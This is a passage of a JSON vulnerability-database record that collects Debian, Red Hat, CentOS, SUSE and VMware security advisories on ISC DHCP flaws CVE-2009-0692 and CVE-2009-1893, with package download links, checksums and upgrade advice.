http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-relay_3.1.1-6+lenny3_ia64.deb\n Size/MD5 checksum: 155090 8f8b0bfb1d3e0755c15df15fc920a8af\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client-udeb_3.1.1-6+lenny3_ia64.udeb\n Size/MD5 checksum: 289292 c997f11a86e7df414bacbad0e5e944be\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-dev_3.1.1-6+lenny3_ia64.deb\n Size/MD5 checksum: 159892 12cd71f2e058c63a602d74983adb5c39\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server-ldap_3.1.1-6+lenny3_ia64.deb\n Size/MD5 checksum: 464804 ceb110ae2899d450987ca83dfdb38944\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client_3.1.1-6+lenny3_ia64.deb\n Size/MD5 checksum: 347522 4c9f4bdec5669dc29b46a6e83a4fa5ef\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server_3.1.1-6+lenny3_ia64.deb\n Size/MD5 checksum: 508092 a1a293a6ddee469e040d7ff364ee791a\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-common_3.1.1-6+lenny3_ia64.deb\n Size/MD5 checksum: 400328 937f8ee9ac9d25af6921222e7b92a108\n\nmips architecture (MIPS (Big Endian))\n\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-dev_3.1.1-6+lenny3_mips.deb\n Size/MD5 checksum: 123936 53d5f37d69d182cbbe312f52550a84b1\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-relay_3.1.1-6+lenny3_mips.deb\n Size/MD5 checksum: 114502 dee95947cb21084abf748e8a42960846\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client-udeb_3.1.1-6+lenny3_mips.udeb\n Size/MD5 checksum: 188178 2926264f19c138bdd2c72458606e4c0c\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server_3.1.1-6+lenny3_mips.deb\n Size/MD5 checksum: 359836 a903759df5a549c6a5e3aa227790fe04\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-common_3.1.1-6+lenny3_mips.deb\n Size/MD5 checksum: 308718 a476ebabd4537f41f1d5a787ea7ff9fa\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client_3.1.1-6+lenny3_mips.deb\n Size/MD5 checksum: 245276 c95b1fccff2d8ad01b5cbc4981eeac8c\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server-ldap_3.1.1-6+lenny3_mips.deb\n Size/MD5 checksum: 314998 80f09a90d259ce66a342447d98a9a379\n\nmipsel architecture (MIPS (Little Endian))\n\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client_3.1.1-6+lenny3_mipsel.deb\n Size/MD5 checksum: 247700 eda49dcddd8fdfd58b85645c315c5faf\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-common_3.1.1-6+lenny3_mipsel.deb\n Size/MD5 checksum: 310874 a05df96245d09530155f9e81bd63a4fb\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server_3.1.1-6+lenny3_mipsel.deb\n Size/MD5 checksum: 362206 a57eeaf69fd65711afe6cb5417e5f0df\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-dev_3.1.1-6+lenny3_mipsel.deb\n Size/MD5 checksum: 125542 4a1784603dae8acfae95d4f9d0ce8e30\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client-udeb_3.1.1-6+lenny3_mipsel.udeb\n Size/MD5 checksum: 190284 30cff1bafcc1ba24b5b5ab7495798dea\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-relay_3.1.1-6+lenny3_mipsel.deb\n Size/MD5 checksum: 116262 f3956046702a31009c21bc4a18279052\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server-ldap_3.1.1-6+lenny3_mipsel.deb\n Size/MD5 checksum: 317264 25bb814dfa93b8114fc6d0a0ddd0cbdf\n\npowerpc architecture (PowerPC)\n\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-relay_3.1.1-6+lenny3_powerpc.deb\n Size/MD5 checksum: 111052 8e0dfe581f4cfb3bcd0e74490cbcffab\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-dev_3.1.1-6+lenny3_powerpc.deb\n Size/MD5 checksum: 119514 99c8afb47de64f36a82db6cd21513476\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client_3.1.1-6+lenny3_powerpc.deb\n Size/MD5 checksum: 241126 e779f852e414e537a35295f238d38356\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server_3.1.1-6+lenny3_powerpc.deb\n Size/MD5 checksum: 353466 9af62ed705a6ae46b208579dfa481d6a\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client-udeb_3.1.1-6+lenny3_powerpc.udeb\n Size/MD5 checksum: 183816 4438592b9fdf9117b8c037a7047ee5f8\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server-ldap_3.1.1-6+lenny3_powerpc.deb\n Size/MD5 checksum: 310638 3d93a3137afe44b45de6c398bdb701c8\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-common_3.1.1-6+lenny3_powerpc.deb\n Size/MD5 checksum: 304958 b2a44d63cc34124883564f5296ef18e7\n\ns390 architecture (IBM S/390)\n\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-dev_3.1.1-6+lenny3_s390.deb\n Size/MD5 checksum: 117592 db3a8ae34c5e3a836dbf9e72c5067a90\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server_3.1.1-6+lenny3_s390.deb\n Size/MD5 checksum: 348950 3ecac83017405ee2aa924cfb5905233d\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client-udeb_3.1.1-6+lenny3_s390.udeb\n Size/MD5 checksum: 182078 35859dae5c87aae0fef90f2ab796714e\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-relay_3.1.1-6+lenny3_s390.deb\n Size/MD5 checksum: 112450 1243ac51995a6a6492d8b3da08d6fd5a\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client_3.1.1-6+lenny3_s390.deb\n Size/MD5 checksum: 239428 ea577141dbeff528fa9b431fd712d7e8\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-common_3.1.1-6+lenny3_s390.deb\n Size/MD5 checksum: 303426 546d21f56cfad698fa28856cc2181c19\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server-ldap_3.1.1-6+lenny3_s390.deb\n Size/MD5 checksum: 303700 4e76286fe1a10d48537c4246b35526b9\n\nsparc architecture (Sun SPARC/UltraSPARC)\n\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-common_3.1.1-6+lenny3_sparc.deb\n Size/MD5 checksum: 283826 c0f5fce1f190aabd11b1851636af3ea3\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server_3.1.1-6+lenny3_sparc.deb\n Size/MD5 checksum: 324576 13f0ac8544ff2f50b27a44dc1d0e5e95\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server-ldap_3.1.1-6+lenny3_sparc.deb\n Size/MD5 checksum: 279396 6171cb5605c87dddaa215eba5f15e38d\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client_3.1.1-6+lenny3_sparc.deb\n Size/MD5 checksum: 218466 e3fab612bad763549dd5d4cd94dd6892\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-relay_3.1.1-6+lenny3_sparc.deb\n Size/MD5 checksum: 101600 d5d9016bdb0723205e3b0e5463315fda\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-dev_3.1.1-6+lenny3_sparc.deb\n Size/MD5 checksum: 109816 85e004868374d6dbc78255efff2fbf7f\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client-udeb_3.1.1-6+lenny3_sparc.udeb\n Size/MD5 checksum: 161378 2b4b855d8e3b8790e34a3de715df9db2\n\n\n These files will probably be moved into the stable distribution on\n its next update.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n", "modified": "2009-08-25T19:57:41", "published": "2009-08-25T19:57:41", "id": "DEBIAN:DSA-1833-2:0E236", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2009/msg00190.html", "title": "[SECURITY] [DSA 1833-2] New dhcp3 packages fix arbitrary code execution", "type": "debian", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "redhat": [{"lastseen": "2018-12-11T17:43:35", "bulletinFamily": "unix", "description": "The Dynamic Host Configuration Protocol (DHCP) is a protocol that allows\nindividual devices on an IP network to get their own network configuration\ninformation, including an IP address, a subnet mask, and a broadcast\naddress.\n\nThe Mandriva Linux Engineering Team discovered a stack-based buffer\noverflow flaw in the ISC DHCP client. If the DHCP client were to receive a\nmalicious DHCP response, it could crash or execute arbitrary code with the\npermissions of the client (root). (CVE-2009-0692)\n\nAn insecure temporary file use flaw was discovered in the DHCP daemon's\ninit script (\"/etc/init.d/dhcpd\"). A local attacker could use this flaw to\noverwrite an arbitrary file with the output of the \"dhcpd -t\" command via\na symbolic link attack, if a system administrator executed the DHCP init\nscript with the \"configtest\", \"restart\", or \"reload\" option.\n(CVE-2009-1893)\n\nUsers of DHCP should upgrade to these updated packages, which contain\nbackported patches to correct these issues.", "modified": "2018-05-26T04:26:18", "published": "2009-07-14T04:00:00", "id": "RHSA-2009:1154", "href": "https://access.redhat.com/errata/RHSA-2009:1154", "type": "redhat", "title": "(RHSA-2009:1154) Critical: dhcp security update", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "centos": [{"lastseen": "2017-10-12T14:44:51", "bulletinFamily": "unix", "description": "**CentOS Errata and Security Advisory** CESA-2009:1154\n\n\nThe Dynamic Host Configuration Protocol (DHCP) is a protocol that allows\nindividual devices on an IP network to get their own network configuration\ninformation, including an IP address, a subnet mask, and a broadcast\naddress.\n\nThe Mandriva Linux Engineering Team discovered a stack-based buffer\noverflow flaw in the ISC DHCP client. If the DHCP client were to receive a\nmalicious DHCP response, it could crash or execute arbitrary code with the\npermissions of the client (root). (CVE-2009-0692)\n\nAn insecure temporary file use flaw was discovered in the DHCP daemon's\ninit script (\"/etc/init.d/dhcpd\"). A local attacker could use this flaw to\noverwrite an arbitrary file with the output of the \"dhcpd -t\" command via\na symbolic link attack, if a system administrator executed the DHCP init\nscript with the \"configtest\", \"restart\", or \"reload\" option.\n(CVE-2009-1893)\n\nUsers of DHCP should upgrade to these updated packages, which contain\nbackported patches to correct these issues.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2009-July/016034.html\nhttp://lists.centos.org/pipermail/centos-announce/2009-July/016035.html\n\n**Affected packages:**\ndhclient\ndhcp\ndhcp-devel\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2009-1154.html", "modified": "2009-07-15T20:59:28", "published": "2009-07-15T20:59:01", "href": "http://lists.centos.org/pipermail/centos-announce/2009-July/016034.html", "id": "CESA-2009:1154", "title": "dhclient, dhcp security update", "type": "centos", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "suse": [{"lastseen": "2016-09-04T11:52:34", "bulletinFamily": "unix", "description": "The DHCP client (dhclient) could be crashed by a malicious DHCP server sending an overlong subnet field (CVE-2009-0692). In theory a malicious DHCP server could exploit the flaw to execute arbitrary code as root on machines using dhclient to obtain network settings. Newer distributions (SLES10+, openSUSE) do have buffer overflow checking that guards against this kind of stack overflow though. So actual exploitability is rather unlikely.\n#### Solution\nThere is no known workaround, please install the update packages.", "modified": "2009-07-15T16:27:03", "published": "2009-07-15T16:27:03", "id": "SUSE-SA:2009:037", "href": "http://lists.opensuse.org/opensuse-security-announce/2009-07/msg00003.html", "type": "suse", "title": "remote code execution in dhcp-client", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "vmware": [{"lastseen": "2018-09-02T02:40:39", "bulletinFamily": "unix", "description": "a. Service Console update for DHCP and third party library update for DHCP client. \n \nDHCP is an Internet-standard protocol by which a computer can be \nconnected to a local network, ask to be given configuration \ninformation, and receive from a server enough information to \nconfigure itself as a member of that network.\n\n \nA stack-based buffer overflow in the script_write_params method in \nISC DHCP dhclient allows remote DHCP servers to execute arbitrary \ncode via a crafted subnet-mask option.\n\n \nThe Common Vulnerabilities and Exposures Project (cve.mitre.org) \nhas assigned the name CVE-2009-0692 to this issue.\n\n \nAn insecure temporary file use flaw was discovered in the DHCP \ndaemon's init script (\"/etc/init.d/dhcpd\"). A local attacker could \nuse this flaw to overwrite an arbitrary file with the output of the \n\"dhcpd -t\" command via a symbolic link attack, if a system \nadministrator executed the DHCP init script with the \"configtest\", \n\"restart\", or \"reload\" option.\n\n \nThe Common Vulnerabilities and Exposures Project (cve.mitre.org) \nhas assigned the name CVE-2009-1893 to this issue.\n\n \nThe following table lists what action remediates the vulnerability \nin the Service Console (column 4) if a solution is available. \n\n", "modified": "2010-01-06T00:00:00", "published": "2009-10-16T00:00:00", "id": "VMSA-2009-0014", "href": "https://www.vmware.com/security/advisories/VMSA-2009-0014.html", "title": "VMware ESX patches for DHCP, Service Console kernel, and JRE resolve multiple security issues", "type": "vmware", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}
